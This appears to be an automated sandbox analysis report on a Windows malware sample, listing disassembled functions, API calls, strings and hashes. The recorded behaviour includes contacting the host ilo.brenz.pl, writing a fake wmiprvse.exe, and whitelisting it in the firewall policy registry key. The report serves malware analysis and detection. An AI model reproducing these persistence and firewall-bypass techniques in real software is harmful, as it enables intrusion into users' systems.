"7@, xrefs: 004025B4, 004025CB
47@, xrefs: 004025A5
SYSTEM\CurrentControlSet\Services\, xrefs: 0040252D
ImagePath, xrefs: 0040259F
F7@, xrefs: 0040255F

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: MemoryZerolstrcatlstrcpy
String ID: "7@$100200$47@$F7@$ImagePath$SYSTEM\CurrentControlSet\Services\
API String ID: 1768957353-3519508139
Opcode ID: 8a600dd736f3a178a13575e9a99342727ac9e09ed908883fd0121ec29af1dff4
Instruction ID: a495424809a9f9f54fedb59a1f20414eed3fe88150acac704cb64e1485c9eeb3
Opcode Fuzzy Hash: 8a600dd736f3a178a13575e9a99342727ac9e09ed908883fd0121ec29af1dff4
Instruction Fuzzy Hash: 8C51B435780305AFE320DB34ED49FEB37A8EB84721F504839FA46E11D0E6BD9519866D

Function 006F3F8F Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 224networkthreadlibraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(006F3F83), ref: 006F3F8F
WSAStartup.WS2_32(00000101), ref: 006F3FCE
CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 006F3FE9
CloseHandle.KERNEL32(?,00000000), ref: 006F3FF2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 006F3FFF
lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 006F4057
gethostbyname.WS2_32(ilo.brenz.pl), ref: 006F4066
socket.WS2_32(00000002,00000001,00000000), ref: 006F4097
connect.WS2_32(6F6C6902,006F3B09,00000010), ref: 006F40B1
GetVersionExA.KERNEL32(?,?,00000000), ref: 006F40FB
wsprintfA.USER32 ref: 006F4179
CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 006F41B4
CloseHandle.KERNEL32(?,00000000,6F6C6902,006F6AA2,00000000,00000000), ref: 006F41BD
GetTickCount.KERNEL32 ref: 006F41F6
RtlExitUserThread.NTDLL(00000000), ref: 006F4322

Strings

ilo.brenz.pl, xrefs: 006F4056, 006F4065
020a00 . . :#a260b0403 +*, xrefs: 006F4195, 006F41DB
C:\WINDOWS\SYSTEM32\UXTHEME.DLL, xrefs: 006F41DA

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID: CreateThread$CloseHandle$CountEventExitLibraryLoadStartupTickUserVersionconnectgethostbynamelstrlensocketwsprintf
String ID: 020a00 . . :#a260b0403 +*$C:\WINDOWS\SYSTEM32\UXTHEME.DLL$ilo.brenz.pl
API String ID: 3316401344-4011269892
Opcode ID: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
Instruction ID: 05e8b580a982364d788afafe6aac2302bc95c98334f791d2a3b6b83624e4571d
Opcode Fuzzy Hash: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
Instruction Fuzzy Hash: 8291CA3150824DBAEB319F24881DBFE7BAEEF41300F040558EA5A9E681CBF45F45CB65

Function 7FE3307C Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 292filelibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(7FE33071), ref: 7FE3307C
GetSystemDirectoryA.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,00000104), ref: 7FE33093
CreateFileA.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,40000000,00000000,00000000,00000003,00000000,00000000), ref: 7FE330D4
WriteFile.KERNEL32(00000000,7FE33EDB,00000019,C:\Windows\sysWOW64\wbem\wmiprvse.exe,00000000,00000000), ref: 7FE330F6
CloseHandle.KERNEL32(?,00000003), ref: 7FE330FC
GetProcAddress.KERNEL32(00000000,7FE3311D), ref: 7FE33128
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE3313B
GetTickCount.KERNEL32 ref: 7FE3316F
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FE3637A,00000000,00000000,00000000,00000000), ref: 7FE33241

Strings

"', xrefs: 7FE332BA
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE3330F
ADVAPI32.DLL, xrefs: 7FE3313A
hell32.dll,-1, xrefs: 7FE3328E, 7FE3330E
C:\Windows\sysWOW64\wbem\wmiprvse.exe, xrefs: 7FE33092, 7FE330A2, 7FE330D3, 7FE330EE
"', xrefs: 7FE33114

Memory Dump Source

Source File: 00000006.00000002.2017052696.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_hrl97BF.jbxd

Similarity

API ID: FileHandle$AddressCloseCountCreateDirectoryInformationLibraryLoadModuleProcSystemTickVolumeWrite
String ID: "'$"'$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$hell32.dll,-1
API String ID: 1729360627-4128452508
Opcode ID: 19b44635278fe99a4415179c49d6eb8c4f8a4d309380675498a1a4a2d9bdcc0e
Instruction ID: 6b64a43cb509898f68348655a96a0e184e2e065f58832200b8bd953c97f5cb1b
Opcode Fuzzy Hash: 19b44635278fe99a4415179c49d6eb8c4f8a4d309380675498a1a4a2d9bdcc0e
Instruction Fuzzy Hash: 2591F271954358BFEB269F20CC0EFEA3B6CDF41311F80011AED5A9A081DAF46F06D6A5

Function 7FE330AB Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 273stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,7FE3309E), ref: 7FE330AC

Part of subcall function 7FE330BE: lstrcat.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,7FE330B7), ref: 7FE330BF
Part of subcall function 7FE330BE: CreateFileA.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,40000000,00000000,00000000,00000003,00000000,00000000), ref: 7FE330D4
Part of subcall function 7FE330BE: WriteFile.KERNEL32(00000000,7FE33EDB,00000019,C:\Windows\sysWOW64\wbem\wmiprvse.exe,00000000,00000000), ref: 7FE330F6
Part of subcall function 7FE330BE: CloseHandle.KERNEL32(?,00000003), ref: 7FE330FC
Part of subcall function 7FE330BE: GetProcAddress.KERNEL32(00000000,7FE3311D), ref: 7FE33128
Part of subcall function 7FE330BE: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE3313B
Part of subcall function 7FE330BE: GetTickCount.KERNEL32 ref: 7FE3316F

Strings

"', xrefs: 7FE332BA
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE3330F
ADVAPI32.DLL, xrefs: 7FE3313A
hell32.dll,-1, xrefs: 7FE3328E, 7FE3330E
C:\Windows\sysWOW64\wbem\wmiprvse.exe, xrefs: 7FE330AB, 7FE330D3, 7FE330EE
"', xrefs: 7FE33114

Memory Dump Source

Source File: 00000006.00000002.2017052696.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_hrl97BF.jbxd

Similarity

API ID: Filelstrcat$AddressCloseCountCreateHandleLibraryLoadProcTickWrite
String ID: "'$"'$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$hell32.dll,-1
API String ID: 4135777234-4128452508
Opcode ID: 6958d413b6abf8e1b28038c6610194ed2bae6efbd87a574ee0b1bcde9ea0452d
Instruction ID: f56c8c8788c1527792fd5fee25e748029393f3a60fbf17811963ed314d73609c
Opcode Fuzzy Hash: 6958d413b6abf8e1b28038c6610194ed2bae6efbd87a574ee0b1bcde9ea0452d
Instruction Fuzzy Hash: 9091F171944718BFEB269F208C0EFEA3B6CDF41311F80011AED5A9E081DAF4AF05D6A5

Function 7FE330BE Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 264filelibrarystringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,7FE330B7), ref: 7FE330BF
CreateFileA.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,40000000,00000000,00000000,00000003,00000000,00000000), ref: 7FE330D4
WriteFile.KERNEL32(00000000,7FE33EDB,00000019,C:\Windows\sysWOW64\wbem\wmiprvse.exe,00000000,00000000), ref: 7FE330F6
CloseHandle.KERNEL32(?,00000003), ref: 7FE330FC
GetProcAddress.KERNEL32(00000000,7FE3311D), ref: 7FE33128
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE3313B
GetTickCount.KERNEL32 ref: 7FE3316F
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FE3637A,00000000,00000000,00000000,00000000), ref: 7FE33241

Strings

"', xrefs: 7FE332BA
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE3330F
ADVAPI32.DLL, xrefs: 7FE3313A
hell32.dll,-1, xrefs: 7FE3328E, 7FE3330E
C:\Windows\sysWOW64\wbem\wmiprvse.exe, xrefs: 7FE330BE, 7FE330D3, 7FE330EE
"', xrefs: 7FE33114

Memory Dump Source

Source File: 00000006.00000002.2017052696.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_hrl97BF.jbxd

Similarity

API ID: File$AddressCloseCountCreateHandleInformationLibraryLoadProcTickVolumeWritelstrcat
String ID: "'$"'$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$hell32.dll,-1
API String ID: 3969241177-4128452508
Opcode ID: e99baabed080411f04b0d806c93d617434853b94cdc5a730a8b5d052636699dc
Instruction ID: 09541bb4dc3411c55ab005cb888b55fbb50cd13fbca17e3ae23e295a94b6b269
Opcode Fuzzy Hash: e99baabed080411f04b0d806c93d617434853b94cdc5a730a8b5d052636699dc
Instruction Fuzzy Hash: 7281BE71914718BFEB269F208C0EFEA3B6DDF41311F80011AED5A9E081EAF46F05D6A5

Function 00402330 Relevance: 35.1, APIs: 6, Strings: 14, Instructions: 69librarystringloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 0040239F
GetProcAddress.KERNEL32(00000000), ref: 004023A6
GetTempPathA.KERNEL32(00000104,?), ref: 004023DE
lstrcatA.KERNEL32(?,SOFTWARE.LOG), ref: 004023F1
MoveFileExA.KERNEL32(?,?,00000003(MOVEFILE_REPLACE_EXISTING|MOVEFILE_COPY_ALLOWED)), ref: 0040240C
MoveFileExA.KERNEL32(?,00000000,00000005(MOVEFILE_REPLACE_EXISTING|MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040241E

Strings

t, xrefs: 0040235B
N, xrefs: 00402386
i, xrefs: 0040237D
d, xrefs: 0040236A
o, xrefs: 00402365
u, xrefs: 0040236F
a, xrefs: 0040238B
m, xrefs: 00402390
SOFTWARE.LOG, xrefs: 004023EB
kernel32.dll, xrefs: 00402351
G, xrefs: 00402356
M, xrefs: 00402360
A, xrefs: 00402395
F, xrefs: 00402378

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: FileMove$AddressLibraryLoadPathProcTemplstrcat
String ID: A$F$G$M$N$SOFTWARE.LOG$a$d$i$kernel32.dll$m$o$t$u
API String ID: 20907805-1765106238
Opcode ID: 7fd43944f68fb6c432481ebaa13493a170158cfa409d862e8056095c2823890d
Instruction ID: 27376e1d226d6c03194d421c0e1a1af7b37e71632551d2efb61b8b65d87483f2
Opcode Fuzzy Hash: 7fd43944f68fb6c432481ebaa13493a170158cfa409d862e8056095c2823890d
Instruction Fuzzy Hash: EE216F7114C3C2DEE312CB68C908B9BBFD45BAA704F08495DB2C456282D6B9961CC7B7

Function 7FE32FCB Relevance: 33.6, APIs: 13, Strings: 6, Instructions: 309filelibraryloaderCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,40000000,00000000,00000000,00000003,00000000,00000000), ref: 7FE330D4
WriteFile.KERNEL32(00000000,7FE33EDB,00000019,C:\Windows\sysWOW64\wbem\wmiprvse.exe,00000000,00000000), ref: 7FE330F6
CloseHandle.KERNEL32(?,00000003), ref: 7FE330FC
GetProcAddress.KERNEL32(00000000,7FE3311D), ref: 7FE33128
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE3313B
GetTickCount.KERNEL32 ref: 7FE3316F

Strings

"', xrefs: 7FE332BA
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE3330F
ADVAPI32.DLL, xrefs: 7FE3313A
hell32.dll,-1, xrefs: 7FE3328E, 7FE3330E
C:\Windows\sysWOW64\wbem\wmiprvse.exe, xrefs: 7FE330D3, 7FE330EE
"', xrefs: 7FE33114

Memory Dump Source

Source File: 00000006.00000002.2017052696.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_hrl97BF.jbxd

Similarity

API ID: File$AddressCloseCountCreateHandleLibraryLoadProcTickWrite
String ID: "'$"'$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$hell32.dll,-1
API String ID: 896256579-4128452508
Opcode ID: 725bb423a29dcd62c43598a103823de9de260c4f48a9b794d588fa8ccf6d82a8
Instruction ID: 9c4dac55b76228d7ff9437610bb880f50dd66be18c7f3b043a5811b11c928d4e
Opcode Fuzzy Hash: 725bb423a29dcd62c43598a103823de9de260c4f48a9b794d588fa8ccf6d82a8
Instruction Fuzzy Hash: E6A1F571954718BFEB269F208C0EFEA37ADDF41311F80011AED5A9E081DAF46F05D6A5

Function 006F3EB5 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 276networklibrarythreadCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(006F3EA9), ref: 006F3EB5

Part of subcall function 006F3ECC: GetProcAddress.KERNEL32(00000000,006F3EC0), ref: 006F3ECD
Part of subcall function 006F3ECC: GetModuleFileNameA.KERNEL32(00000000,020a00 . . :#a260b0403 +*,000000C8), ref: 006F3EE2
Part of subcall function 006F3ECC: wsprintfA.USER32 ref: 006F3EF7
Part of subcall function 006F3ECC: CreateThread.KERNEL32(00000000,00000000,006F3691,00000000,00000000), ref: 006F3F40
Part of subcall function 006F3ECC: CloseHandle.KERNEL32(?,1C567C50), ref: 006F3F49

CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 006F3FE9
CloseHandle.KERNEL32(?,00000000), ref: 006F3FF2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 006F3FFF
socket.WS2_32(00000002,00000001,00000000), ref: 006F4097
connect.WS2_32(6F6C6902,006F3B09,00000010), ref: 006F40B1
GetVersionExA.KERNEL32(?,?,00000000), ref: 006F40FB
wsprintfA.USER32 ref: 006F4179

Strings

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 006F3F0C
020a00 . . :#a260b0403 +*, xrefs: 006F3EDF, 006F3EF4, 006F3F0B, 006F4195, 006F41DB
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 006F3EF6, 006F3F08
C:\WINDOWS\SYSTEM32\UXTHEME.DLL, xrefs: 006F41DA

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID: Create$CloseHandleThreadwsprintf$AddressEventFileLibraryLoadModuleNameProcVersionconnectsocket
String ID: 020a00 . . :#a260b0403 +*$C:\WINDOWS\SYSTEM32\UXTHEME.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 4150863296-830918593
Opcode ID: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
Instruction ID: 25dce286589678664f3bbf318b25790e34a4572969ecf7ed410312cb35da1780
Opcode Fuzzy Hash: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
Instruction Fuzzy Hash: 73A10171408259BFEB219F248C1EBFB7BAEEF41300F040559EA498E282DAF45F45C7A5

Function 006F3ECC Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 265threadlibraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,006F3EC0), ref: 006F3ECD
GetModuleFileNameA.KERNEL32(00000000,020a00 . . :#a260b0403 +*,000000C8), ref: 006F3EE2
wsprintfA.USER32 ref: 006F3EF7
CreateThread.KERNEL32(00000000,00000000,006F3691,00000000,00000000), ref: 006F3F40
CloseHandle.KERNEL32(?,1C567C50), ref: 006F3F49
CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 006F3FE9
CloseHandle.KERNEL32(?,00000000), ref: 006F3FF2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 006F3FFF

Part of subcall function 006F3405: NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 006F344A
Part of subcall function 006F3405: NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 006F3469
Part of subcall function 006F3405: MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 006F3493
Part of subcall function 006F3405: CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 006F34A0
Part of subcall function 006F3405: UnmapViewOfFile.KERNEL32(?), ref: 006F34B8

Strings

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 006F3F0C
020a00 . . :#a260b0403 +*, xrefs: 006F3EDF, 006F3EF4, 006F3F0B, 006F4195, 006F41DB
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 006F3EF6, 006F3F08
C:\WINDOWS\SYSTEM32\UXTHEME.DLL, xrefs: 006F41DA

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID: CloseCreateFileHandle$ThreadView$AddressEventInformationModuleNameOpenProcQuerySectionSystemUnmapwsprintf
String ID: 020a00 . . :#a260b0403 +*$C:\WINDOWS\SYSTEM32\UXTHEME.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 541178049-830918593
Opcode ID: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
Instruction ID: 6543e2cd33b1d503735f3c52c44325582dfa8ac981989ea5cce864c9ff276362
Opcode Fuzzy Hash: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
Instruction Fuzzy Hash: 80A1F071408258BFEB219F248C1EBFB7BADEF41300F040658EA498E581DAF45F45CBA5

Function 7FE33112 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 233libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(7FE33107), ref: 7FE33112

Part of subcall function 7FE33127: GetProcAddress.KERNEL32(00000000,7FE3311D), ref: 7FE33128
Part of subcall function 7FE33127: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE3313B
Part of subcall function 7FE33127: GetTickCount.KERNEL32 ref: 7FE3316F
Part of subcall function 7FE33127: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FE3637A,00000000,00000000,00000000,00000000), ref: 7FE33241
Part of subcall function 7FE33127: Sleep.KERNEL32(00000064,0000001E), ref: 7FE33288
Part of subcall function 7FE33127: DeleteFileA.KERNEL32(hell32.dll,-1), ref: 7FE3328F

Strings

"', xrefs: 7FE332BA
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE3330F
ADVAPI32.DLL, xrefs: 7FE3313A
hell32.dll,-1, xrefs: 7FE3328E, 7FE3330E

Memory Dump Source

Source File: 00000006.00000002.2017052696.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

